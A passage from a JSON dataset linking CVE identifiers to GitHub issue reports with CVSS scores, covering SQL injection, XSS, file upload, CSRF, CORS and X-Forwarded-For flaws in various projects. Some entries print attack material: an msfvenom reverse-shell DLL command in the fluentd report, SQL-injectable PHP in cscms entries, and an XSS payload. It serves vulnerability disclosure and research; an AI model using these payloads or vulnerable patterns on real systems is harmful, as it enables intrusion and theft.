  58816. "Issue_Url_old": "https://github.com/dotCMS/core/issues/19500",
  58817. "Issue_Url_new": "https://github.com/dotcms/core/issues/19500",
  58818. "Repo_new": "dotcms/core",
  58819. "Issue_Created_At": "2020-10-27T01:40:55Z",
  58820. "description": "SQL Injection Vulnerability in api PATHTAG api : PATHTAG Is vulnerable to SQL injection, by the parameter \u2018orderby\u2019 in url. APITAG APITAG As the pictures above show, APITAG , it took NUMBERTAG seconds to receive the response from server APITAG , it took NUMBERTAG seconds to receive the response from server (the difference in response time is consistent with a time-based blind SQL injection). Then I read through the code that I downloaded from github(version NUMBERTAG I found that the parameter is concatenated into the SQL statement without sanitization (yeah, you have designed APITAG to prevent SQL injection, but in this case, the vulnerable API didn't call APITAG I tried to attack the project by sqlmap(a tool to detect and exploit SQL injection), and here is the result that sqlmap gave me: tables that the project contains: APITAG columns that the table called \u2018adminconfig\u2019 contains: APITAG It is obvious that there is SQL injection in your program. Note for the fix: an ORDER BY column name cannot be supplied as a bound parameter, so \u2018orderby\u2019 must be validated against an allow-list of permitted column names rather than merely escaped.",
  58821. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58822. "severity": "HIGH",
  58823. "baseScore": 8.8,
  58824. "impactScore": 5.9,
  58825. "exploitabilityScore": 2.8
  58826. },
  58827. {
  58828. "CVE_ID": "CVE-2020-27853",
  58829. "Issue_Url_old": "https://github.com/wireapp/wire-audio-video-signaling/issues/23",
  58830. "Issue_Url_new": "https://github.com/wireapp/wire-avs/issues/23",
  58831. "Repo_new": "wireapp/wire-avs",
  58832. "Issue_Created_At": "2020-09-02T13:34:30Z",
  58833. "description": "Format String Vulnerability. Format String Vulnerability There is a Format String vulnerability in sdp.cpp line NUMBERTAG URLTAG The value passed as the format parameter of function APITAG is controllable by an attacker and can lead to a format string attack. The function APITAG is implemented in media.c of the library re. The vulnerability is fixed in current Android and iOS Wire Applications. The vulnerability was exploitable in the Android and iOS Wire Apps at least until Wire Android Version NUMBERTAG and iOS Version NUMBERTAG An attacker could crash remote Wire Applications by placing a call with malformed sdp data, if the remote participant accepts the call. The vulnerability could potentially lead to remote code execution.",
  58834. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58835. "severity": "CRITICAL",
  58836. "baseScore": 9.8,
  58837. "impactScore": 5.9,
  58838. "exploitabilityScore": 3.9
  58839. },
  58840. {
  58841. "CVE_ID": "CVE-2020-27886",
  58842. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/76",
  58843. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/76",
  58844. "Repo_new": "eyesofnetworkcommunity/eonweb",
  58845. "Issue_Created_At": "2020-10-23T07:52:25Z",
  58846. "description": "Multiples vuln\u00e9rabilit\u00e9s critiques. Bonjour, J'ai identifi\u00e9 de nouvelles vuln\u00e9rabilit\u00e9s qui, combin\u00e9es ensemble permettent de prendre le contr\u00f4le complet d'un serveur EON \u00e0 distance mis \u00e0 jour depuis les versions r7 et r8 de eonweb actuellement publi\u00e9es dans les paquets officiels. L'impact est similaire aux codes d'exploitation publi\u00e9s ici : URLTAG J'ai pu valider la pr\u00e9sence des vuln\u00e9rabilit\u00e9s ainsi que l'exploitation de celles ci pouvant amener \u00e0 l'ex\u00e9cution de commandes en tant que root sans authentification pr\u00e9alable. Je peux communiquer les d\u00e9tails des vuln\u00e9rabilit\u00e9s identifi\u00e9es ici si vous le souhaitez.",
  58847. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58848. "severity": "CRITICAL",
  58849. "baseScore": 9.8,
  58850. "impactScore": 5.9,
  58851. "exploitabilityScore": 3.9
  58852. },
  58853. {
  58854. "CVE_ID": "CVE-2020-28062",
  58855. "Issue_Url_old": "https://github.com/hisiphp/hisiphp/issues/10",
  58856. "Issue_Url_new": "https://github.com/hisiphp/hisiphp/issues/10",
  58857. "Repo_new": "hisiphp/hisiphp",
  58858. "Issue_Created_At": "2020-10-21T10:44:22Z",
  58859. "description": "There is a file upload vulnerability that can execute arbitrary code. In APITAG, after the administrator logs in, an installation package (FILETAG file) can be uploaded at system > local plug in > import plug in FILETAG The upload logic is located in the APITAG function of the PATHTAG class, where the zip file is extracted to disk before its contents are checked. A specially crafted package can be constructed that makes APITAG throw an exception, bypassing the security check: package FILETAG as a zip file (make sure there is APITAG /plugins/ under the path). Poc as follows FILETAG The response contains the path FILETAG You can see that FILETAG is uploaded FILETAG",
  58860. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  58861. "severity": "HIGH",
  58862. "baseScore": 7.2,
  58863. "impactScore": 5.9,
  58864. "exploitabilityScore": 1.2
  58865. },
  58866. {
  58867. "CVE_ID": "CVE-2020-28087",
  58868. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg-boot/issues/1887",
  58869. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/1887",
  58870. "Repo_new": "jeecgboot/jeecg-boot",
  58871. "Issue_Created_At": "2020-10-24T09:33:04Z",
  58872. "description": "sql NUMBERTAG After testing, it is found that the code parameter of /jeecg PATHTAG interface of jeecg boot has SQL injection \u622a\u56fe&\u4ee3\u7801\uff1a Reuse URLTAG After the source code of the project starts the project, click \"custom component\" and grab the package to get the interface with SQL injection, and use sqlmap to prove the existence of SQL injection FILETAG FILETAG FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG \u53cb\u60c5\u63d0\u793a\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u76f4\u63a5\u5220\u6389\u3002",
  58873. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58874. "severity": "HIGH",
  58875. "baseScore": 7.5,
  58876. "impactScore": 3.6,
  58877. "exploitabilityScore": 3.9
  58878. },
  58879. {
  58880. "CVE_ID": "CVE-2020-28088",
  58881. "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg-boot/issues/1888",
  58882. "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/1888",
  58883. "Repo_new": "jeecgboot/jeecg-boot",
  58884. "Issue_Created_At": "2020-10-24T10:12:13Z",
  58885. "description": "There is an arbitrary file upload vulnerability NUMBERTAG After testing, it is found that there is an arbitrary file upload vulnerability in the image upload function of \"custom component\" of jeecg boot, and the interface is PATHTAG \u622a\u56fe&\u4ee3\u7801\uff1a Reuse URLTAG After the source code of the project is started, click \"custom component\" and grab the package to get the interface with arbitrary file upload vulnerability FILETAG Modify the upload suffix name and upload content through packet capture FILETAG The vulnerability code exists in the following PATHTAG At line NUMBERTAG of FILETAG \u53cb\u60c5\u63d0\u793a\uff1a \u672a\u6309\u683c\u5f0f\u8981\u6c42\u53d1\u5e16\uff0c\u4f1a\u76f4\u63a5\u5220\u6389\u3002",
  58886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58887. "severity": "CRITICAL",
  58888. "baseScore": 9.8,
  58889. "impactScore": 5.9,
  58890. "exploitabilityScore": 3.9
  58891. },
  58892. {
  58893. "CVE_ID": "CVE-2020-28091",
  58894. "Issue_Url_old": "https://github.com/cbkhwx/cxuucmsv3/issues/1",
  58895. "Issue_Url_new": "https://github.com/cbkhwx/cxuucmsv3/issues/1",
  58896. "Repo_new": "cbkhwx/cxuucmsv3",
  58897. "Issue_Created_At": "2020-10-24T16:32:51Z",
  58898. "description": "SQL injection vulnerability exists in FILETAG url. An SQL injection vulnerability exists in the front end FILETAG page Use sqlmap to inject the demo website\uff1a exp : CODETAG Verify screenshot\uff1a FILETAG",
  58899. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58900. "severity": "HIGH",
  58901. "baseScore": 7.5,
  58902. "impactScore": 3.6,
  58903. "exploitabilityScore": 3.9
  58904. },
  58905. {
  58906. "CVE_ID": "CVE-2020-28092",
  58907. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/6",
  58908. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/6",
  58909. "Repo_new": "lazyphp/PESCMS-TEAM",
  58910. "Issue_Created_At": "2020-11-02T13:50:09Z",
  58911. "description": "PESCMS TEAM NUMBERTAG has multiple reflected Cross Site Scripting vulnerabilities. I found a reflected XSS vulnerability at: URLTAG APITAG When I input the payload APITAG APITAG the full url is : URLTAG Many other pages take an id parameter, and they are all vulnerable to reflected cross site scripting\uff1a URLTAG URLTAG URLTAG URLTAG",
  58912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58913. "severity": "MEDIUM",
  58914. "baseScore": 6.1,
  58915. "impactScore": 2.7,
  58916. "exploitabilityScore": 2.8
  58917. },
  58918. {
  58919. "CVE_ID": "CVE-2020-28102",
  58920. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/9",
  58921. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/9",
  58922. "Repo_new": "chshcms/cscms",
  58923. "Issue_Created_At": "2020-10-26T07:13:46Z",
  58924. "description": "Cscms NUMBERTAG has sqlinjection vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has sqlinjection vulnerabilities Report date NUMBERTAG Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG NUMBERTAG lines NUMBERTAG lines Vulnerability function\uff1ajs_del Vulnerability param:id public function APITAG $id = $this >input >get_post('id'); if(empty($id)) getjson(L('plub NUMBERTAG if(is_array($id)){ foreach ($id as $ids) { $row=$this >db >query(\"SELECT js FROM APITAG where APITAG APITAG if($row){ PATHTAG APITAG } } }else{ $row=$this >db >query(\"SELECT js FROM APITAG where APITAG APITAG if($row){ PATHTAG APITAG } } $this APITAG >get_del('ads',$id); $info FILETAG right answer: FILETAG",
  58925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58926. "severity": "CRITICAL",
  58927. "baseScore": 9.8,
  58928. "impactScore": 5.9,
  58929. "exploitabilityScore": 3.9
  58930. },
  58931. {
  58932. "CVE_ID": "CVE-2020-28103",
  58933. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/8",
  58934. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/8",
  58935. "Repo_new": "chshcms/cscms",
  58936. "Issue_Created_At": "2020-10-26T07:07:29Z",
  58937. "description": "Cscms NUMBERTAG has sqlinjection vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has sqlinjection vulnerabilities Report date NUMBERTAG Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG NUMBERTAG lines NUMBERTAG lines Vulnerability function\uff1apage_del Vulnerability param:id public function APITAG $id = $this >input >get_post('id'); if(empty($id)) getjson(L('plub NUMBERTAG if(is_array($id)){ foreach ($id as $ids) { $row=$this >db >query(\"SELECT sid,url FROM APITAG where APITAG APITAG if($row && $row >sid NUMBERTAG APITAG >url; APITAG } } }else{ $row=$this >db >query(\"SELECT sid,url FROM APITAG where APITAG APITAG if($row && $row >sid NUMBERTAG APITAG >url; APITAG } } $this APITAG >get_del('page',$id); $info FILETAG right answer: FILETAG",
  58938. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58939. "severity": "CRITICAL",
  58940. "baseScore": 9.8,
  58941. "impactScore": 5.9,
  58942. "exploitabilityScore": 3.9
  58943. },
  58944. {
  58945. "CVE_ID": "CVE-2020-28146",
  58946. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/12",
  58947. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/12",
  58948. "Repo_new": "weng-xianhu/eyoucms",
  58949. "Issue_Created_At": "2020-05-29T02:15:56Z",
  58950. "description": "There is a persistent (stored) Cross Site Scripting vulnerability in member contributions. In the member center's contribution page, after editing the contribution content through the editor, intercept the request and modify the parameter addonfieldext FILETAG FILETAG After the administrator logs in to the back end and views the content submitted by the user, the payload executes in the administrator's browser and can be used to obtain the administrator's cookie information. FILETAG",
  58951. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58952. "severity": "MEDIUM",
  58953. "baseScore": 6.1,
  58954. "impactScore": 2.7,
  58955. "exploitabilityScore": 2.8
  58956. },
  58957. {
  58958. "CVE_ID": "CVE-2020-28168",
  58959. "Issue_Url_old": "https://github.com/axios/axios/issues/3369",
  58960. "Issue_Url_new": "https://github.com/axios/axios/issues/3369",
  58961. "Repo_new": "axios/axios",
  58962. "Issue_Created_At": "2020-10-29T14:37:32Z",
  58963. "description": "Requests that follow a redirect are not passing via the proxy. APITAG Describe the bug In cases where axios is used by servers to perform http requests to user supplied urls, a proxy is commonly used to protect internal networks from unauthorized access and SSRF URLTAG . This bug enables an attacker to bypass the proxy by providing a url that responds with a redirect to a restricted host/ip. To Reproduce The following code spawns a proxy server that always responds with a NUMBERTAG redirect, so requests should never reach the target url; however, axios only goes through the proxy for the initial request, and the request that follows the redirect response is sent directly to the target, bypassing the proxy. URLTAG ERRORTAG The response is the rendered html of FILETAG Expected behavior All the requests should pass via the proxy. In the provided scenario, there should be a redirect loop. Environment Axios Version NUMBERTAG FILETAG Version APITAG Additional APITAG Add any other context about the problem here. If applicable, add screenshots to help explain.",
  58964. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58965. "severity": "MEDIUM",
  58966. "baseScore": 5.9,
  58967. "impactScore": 3.6,
  58968. "exploitabilityScore": 2.2
  58969. },
  58970. {
  58971. "CVE_ID": "CVE-2020-28169",
  58972. "Issue_Url_old": "https://github.com/fluent/fluentd/issues/3201",
  58973. "Issue_Url_new": "https://github.com/fluent/fluentd/issues/3201",
  58974. "Repo_new": "fluent/fluentd",
  58975. "Issue_Created_At": "2020-12-11T16:55:44Z",
  58976. "description": "Possible Vulnerability. FILETAG Describe the bug Inappropriate folder permissions allow a possible escalation of privileges on Windows (a limited user can write a DLL into a directory the service loads from). To Reproduce Download URL: FILETAG Vulnerable Path: PATHTAG Steps in reproducing the exploit: Creating a DLL containing a reverse shell with the specific name that FILETAG will search: msfvenom p PATHTAG a NUMBERTAG f dll LHOST= IPADDRESS LPORT= PORT > CRYPTBASE.dll Setting up MSF console to listen for connection. Copying the DLL file that we created to PATHTAG using a limited account: Normally, a limited user might not have the possibility of restarting the service. A potential attacker can wait for the service to be restarted or he can restart the machine from the command line; when the service restarts, it will load the planted DLL and the reverse shell runs with the service's NT AUTHORITY privileges. Expected behavior N/A Your Environment Windows NUMBERTAG If you hit the problem with older fluentd version, try latest version first. Your Configuration Default Your Error Log No errors. Additional context Please add an appropriate contact method to submit possible vulnerabilities and POC's.",
  58977. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58978. "severity": "HIGH",
  58979. "baseScore": 7.0,
  58980. "impactScore": 5.9,
  58981. "exploitabilityScore": 1.0
  58982. },
  58983. {
  58984. "CVE_ID": "CVE-2020-28241",
  58985. "Issue_Url_old": "https://github.com/maxmind/libmaxminddb/issues/236",
  58986. "Issue_Url_new": "https://github.com/maxmind/libmaxminddb/issues/236",
  58987. "Repo_new": "maxmind/libmaxminddb",
  58988. "Issue_Created_At": "2020-08-04T13:43:37Z",
  58989. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), mmdblookup (latest master e6e NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable static Command line PATHTAG ip APITAG file APITAG APITAG output ERRORTAG POC FILETAG",
  58990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  58991. "severity": "MEDIUM",
  58992. "baseScore": 6.5,
  58993. "impactScore": 3.6,
  58994. "exploitabilityScore": 2.8
  58995. },
  58996. {
  58997. "CVE_ID": "CVE-2020-28348",
  58998. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/9303",
  58999. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/9303",
  59000. "Repo_new": "hashicorp/nomad",
  59001. "Issue_Created_At": "2020-11-10T13:30:44Z",
  59002. "description": "placeholder.",
  59003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  59004. "severity": "MEDIUM",
  59005. "baseScore": 6.5,
  59006. "impactScore": 3.6,
  59007. "exploitabilityScore": 2.8
  59008. },
  59009. {
  59010. "CVE_ID": "CVE-2020-28452",
  59011. "Issue_Url_old": "https://github.com/softwaremill/akka-http-session/issues/77",
  59012. "Issue_Url_new": "https://github.com/softwaremill/akka-http-session/issues/77",
  59013. "Repo_new": "softwaremill/akka-http-session",
  59014. "Issue_Created_At": "2020-11-24T16:51:40Z",
  59015. "description": "CSRF protection can be bypassed . Hi again, Another question about the CSRF protection. It can be bypassed by forging a request that contains the same value for both the X XSRF TOKEN header and the XSRF TOKEN cookie value. Any value will do since the only check that is now performed in APITAG is for those two values to be equal and non empty; the token is never validated against anything held or signed server-side, so an attacker who can get a cookie set in the victim's browser for the site (for example from another subdomain) can satisfy the check. Would it be somehow possible to conform to the OWASP recommendations described FILETAG what do you think would be the best approach? Thanks, Willem",
  59016. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  59017. "severity": "HIGH",
  59018. "baseScore": 8.8,
  59019. "impactScore": 5.9,
  59020. "exploitabilityScore": 2.8
  59021. },
  59022. {
  59023. "CVE_ID": "CVE-2020-28456",
  59024. "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/52",
  59025. "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/52",
  59026. "Repo_new": "s-cart/s-cart",
  59027. "Issue_Created_At": "2020-12-01T05:03:16Z",
  59028. "description": "stored XSS . Stored XSS: there is a stored XSS which is critical because an unauthenticated user can submit JavaScript that is later rendered in the admin panel, which could lead to admin account takeover. To Reproduce Steps to reproduce the behavior NUMBERTAG go to the s cart store; while adding a product to the cart, intercept the request and place the payload in the APITAG param FILETAG NUMBERTAG after completing the purchase, the code executes when an administrator tries to edit it in the admin panel. Here is the POC video : URLTAG payload used = \"> APITAG alert(\"test\") APITAG",
  59029. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  59030. "severity": "MEDIUM",
  59031. "baseScore": 6.1,
  59032. "impactScore": 2.7,
  59033. "exploitabilityScore": 2.8
  59034. },
  59035. {
  59036. "CVE_ID": "CVE-2020-28457",
  59037. "Issue_Url_old": "https://github.com/s-cart/s-cart/issues/51",
  59038. "Issue_Url_new": "https://github.com/s-cart/s-cart/issues/51",
  59039. "Repo_new": "s-cart/s-cart",
  59040. "Issue_Created_At": "2020-11-29T12:19:10Z",
  59041. "description": "XSS in admin dashboard. Reflected XSS in admin panel: there is a cross site scripting (XSS) vulnerability in the admin Dashboard. To Reproduce NUMBERTAG the search function in the admin dashboard is vulnerable to XSS URLTAG Screenshots FILETAG Fix for it :) Using APITAG in s cart/core URLTAG will fix this issue FILETAG",
  59042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  59043. "severity": "MEDIUM",
  59044. "baseScore": 4.8,
  59045. "impactScore": 2.7,
  59046. "exploitabilityScore": 1.7
  59047. },
  59048. {
  59049. "CVE_ID": "CVE-2020-28468",
  59050. "Issue_Url_old": "https://github.com/Gallopsled/pwntools/issues/1427",
  59051. "Issue_Url_new": "https://github.com/gallopsled/pwntools/issues/1427",
  59052. "Repo_new": "gallopsled/pwntools",
  59053. "Issue_Created_At": "2020-02-08T23:06:53Z",
  59054. "description": "Shellcraft generation fails with strings that contain the end of a multiline comment. APITAG ERRORTAG The bug is in APITAG : the input string is inserted unescaped into the generated assembly source, so a string containing the comment terminator closes the multi line comment and cpp fails to compile our assembly (anything after the terminator is then treated as source rather than comment text). This happens for me on APITAG : APITAG But was also reproduced on APITAG (commit id: APITAG",
  59055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  59056. "severity": "CRITICAL",
  59057. "baseScore": 9.8,
  59058. "impactScore": 5.9,
  59059. "exploitabilityScore": 3.9
  59060. },
  59061. {
  59062. "CVE_ID": "CVE-2020-28477",
  59063. "Issue_Url_old": "https://github.com/immerjs/immer/issues/738",
  59064. "Issue_Url_new": "https://github.com/immerjs/immer/issues/738",
  59065. "Repo_new": "immerjs/immer",
  59066. "Issue_Created_At": "2021-01-19T17:50:14Z",
  59067. "description": "Prototype Pollution vulnerability . \ud83d\udc1b Bug Report A Prototype Pollution vulnerability has been raised by Snyk and it is affecting all versions of immer. Find more details here URLTAG It is currently blocking me for adding immer as a dependency to my projects. Cheers",
  59068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  59069. "severity": "HIGH",
  59070. "baseScore": 7.5,
  59071. "impactScore": 3.6,
  59072. "exploitabilityScore": 3.9
  59073. },
  59074. {
  59075. "CVE_ID": "CVE-2020-28481",
  59076. "Issue_Url_old": "https://github.com/socketio/socket.io/issues/3671",
  59077. "Issue_Url_new": "https://github.com/socketio/socket.io/issues/3671",
  59078. "Repo_new": "socketio/socket.io",
  59079. "Issue_Created_At": "2020-10-29T20:20:39Z",
  59080. "description": "CORS Misconfiguration in socket.io. Note: This issue was originally reported to FILETAG but as per them this issue has to be fixed by you guys, thus raising it here. The details which was shared with them is given below: While testing FILETAG I found a security issue at socket.io endpoint, description for the same is given below: Vulnerability Name: Misconfigured CORS Implementation: Arbitrary & Unencrypted Origin Trusted In APITAG at socket.io endpoint Description: Cross Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. If misconfigured, it can lead to dangerous results. An HTML5 cross origin resource sharing (CORS) policy controls whether and how content running on other domains can perform two way interaction with the domain that publishes the policy. The policy is fine grained and can apply access controls per request based on the URL and other features of the request. Analysis: During the analysis, it was observed that the application was accepting arbitrary unencrypted domains in APITAG Control Allow Origin\u201d header thus allowing domain controlled by a malicious party to send requests to the APITAG domain which can lead to API key stealing, Cross Site Scripting, Sensitive Information Disclosure, etc. Proof of Concept: FILETAG Step NUMBERTAG Login into the application and intercept the following API call URLTAG by looking at the headers it can be seen that application has implemented CORS and is allowing cross domain communication. Please note that traditional CORS exploitation won't be working here as application is properly validating the value of Origin header which is coming in request. Now, send following domain in the Origin header FILETAG CODETAG . 
APITAG poc in Safari Browser, it can be seen that malicious domain is able to send authenticated requests to the APITAG domain which can lead to Sensitive Information Disclosure(here in our case sid and other details are being leaked). Note: All endpoints where application is taking values from Origin and directly appending it in Access Control Allow Origin header in response, this vulnerability can be exploited. Impact NUMBERTAG Impact of Trusting Arbitrary Origin: Trusting arbitrary origins effectively disables the same origin policy, allowing two way interaction by third party web sites. Unless the response consists only of unprotected public content, this policy is likely to present a security risk. If the site specifies the header Access Control Allow Credentials: true, third party sites may be able to carry out privileged actions and retrieve sensitive information. Even if it does not, attackers may be able to bypass any IP based access controls by proxying through users' browsers NUMBERTAG Impact of trusting Unencrypted Origin If a site allows interaction from an origin that uses unencrypted HTTP communications, then it is vulnerable to an attacker who is in a position to view and modify a user's unencrypted network traffic. The attacker can control the responses from unencrypted origins, thereby injecting content that is able to interact with the application that publishes the policy. This means that the application is effectively extending trust to all such attackers, thereby undoing much of the benefit of using HTTPS communications. Recommendation: Following are the recommendations: Ensure that URLs responding with Access Control Allow Origin: do not include any sensitive content or information that might aid attacker in further attacks. Use the Access Control Allow Origin header only on chosen URLs that need to be accessed cross domain. Don't use the header for the whole domain. 
Allow only selected, trusted domains in the Access Control Allow Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use wildcard nor blindly return the Origin header content without any checks). Application shall not dynamically generate APITAG Control Allow Origin\u201d header and proper whitelisting should be done of the domains which application wants to trust. It is recommended that application shall not dynamically generate APITAG Control Allow Origin\u201d header and proper whitelisting should be done of the domains which application wants to trust. Please make sure that you only trust origins that use encrypted HTTPS communications.",
  59081. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  59082. "severity": "MEDIUM",
  59083. "baseScore": 4.3,
  59084. "impactScore": 1.4,
  59085. "exploitabilityScore": 2.8
  59086. },
  59087. {
  59088. "CVE_ID": "CVE-2020-28483",
  59089. "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2862",
  59090. "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2862",
  59091. "Repo_new": "gin-gonic/gin",
  59092. "Issue_Created_At": "2021-09-07T19:52:25Z",
  59093. "description": "X Forwarded For handling is still unsafe, CVETAG is NOT fixed. Description APITAG / trusted proxy handling is incorrect, which makes it possible for anyone to force the value of APITAG , if: the app has trusted proxies defined and the trusted proxy handles APITAG in the usual way, by appending its own IP address at the end (the default configuration trusts every proxy and is of course also vulnerable, in a very trivial way). This was reported in URLTAG with a fix at URLTAG That PR did not get merged, and the one that did ( URLTAG does not fix the issue. There is a fix for this already at URLTAG APITAG How to reproduce You actually have that in your tests already, see URLTAG But here's a standalone version APITAG ERRORTAG Expectations APITAG Actual result APITAG APITAG Environment go version NUMBERTAG gin version (or commit ref NUMBERTAG operating system: APITAG",
  59094. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
  59095. "severity": "HIGH",
  59096. "baseScore": 7.1,
  59097. "impactScore": 4.2,
  59098. "exploitabilityScore": 2.8
  59099. },
  59100. {
  59101. "CVE_ID": "CVE-2020-28483",
  59102. "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2473",
  59103. "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2473",
  59104. "Repo_new": "gin-gonic/gin",
  59105. "Issue_Created_At": "2020-08-20T11:40:37Z",
  59106. "description": "X Forwarded For handling is unsafe. URLTAG If Gin is exposed directly to the internet, a client can easily spoof its client IP by simply setting an X Forwarded For header. The correct way to handle this is to require a list of trusted proxies to be configured. If unset, X Forwarded For should be ignored. I filed a similar issue against Cloud Foundry's gorouter a few years ago. cloudfoundry/gorouter NUMBERTAG In case that repo should migrate elsewhere, I'm copying the contents of the report in its entirety here: Issue X Forwarded For is passed through unfiltered, allowing anyone to spoof their origin IP. Context X Forwarded For records the path a given request has taken. The first IP is the origin client, each subsequent IP denotes a path along the way (proxies, load balancers, whatever). It's the only way for a backend service to determine the original IP, since the incoming connection is from the gorouter. However, blindly trusting the header obviously allows anyone to spoof the origin IP. Common ways to address this security problem is to only trust X Forwarded For headers from trusted sources. Examples of how to mitigate this problem: URLTAG URLTAG Steps to Reproduce Pass a X Forwarded For header with someone else's IP (e.g NUMBERTAG in it to your application, and it'll appear as though that's where the request came from. Expected result Since I'm not a trusted client, my X Forwarded For header should have been discarded, and my IP should be the first in the X Forwarded For header received by the backend. Current result The backend service will see an X Forwarded For header reading NUMBERTAG my real IP], [gorouter IP]\" (possibly more, if there's a load balancer or something in the path). It will think the request came from NUMBERTAG Possible Fix Allow specifying a list of IPs (or CIDR's) of trusted proxies and load balancers. If the request didn't come from one of them, discard the X Forwarded For. 
For bonus points, do what nginx does: Go through the list (starting from the last entry) and check each entry to see if it's the list of trusted proxies. When one is encountered that's not on the list, discard everything before it. All of the above also applies to X Forwarded Proto. We shouldn't trust people to say that their request was ever HTTPS if it never was.",
  59107. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
  59108. "severity": "HIGH",
  59109. "baseScore": 7.1,
  59110. "impactScore": 4.2,
  59111. "exploitabilityScore": 2.8
  59112. },
  59113. {
  59114. "CVE_ID": "CVE-2020-28483",
  59115. "Issue_Url_old": "https://github.com/gin-gonic/gin/issues/2232",
  59116. "Issue_Url_new": "https://github.com/gin-gonic/gin/issues/2232",
  59117. "Repo_new": "gin-gonic/gin",
  59118. "Issue_Created_At": "2020-02-11T23:31:35Z",
  59119. "description": "X Forwarded For header should be processed last to first to prevent IP spoofing. Description APITAG header should be processed last to first to prevent IP spoofing, as explained in this post URLTAG . This requires configuring the IP addresses of known (trusted) proxies so that their entries are skipped while walking the header from right to left; the first entry that is not a trusted proxy is the client IP, and anything before it is untrusted. Current implementation In FILETAG : CODETAG",
  59120. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
  59121. "severity": "HIGH",
  59122. "baseScore": 7.1,
  59123. "impactScore": 4.2,
  59124. "exploitabilityScore": 2.8
  59125. },
  59126. {
  59127. "CVE_ID": "CVE-2020-28487",
  59128. "Issue_Url_old": "https://github.com/visjs/vis-timeline/issues/838",
  59129. "Issue_Url_new": "https://github.com/visjs/vis-timeline/issues/838",
  59130. "Repo_new": "visjs/vis-timeline",
  59131. "Issue_Created_At": "2020-12-18T11:09:53Z",
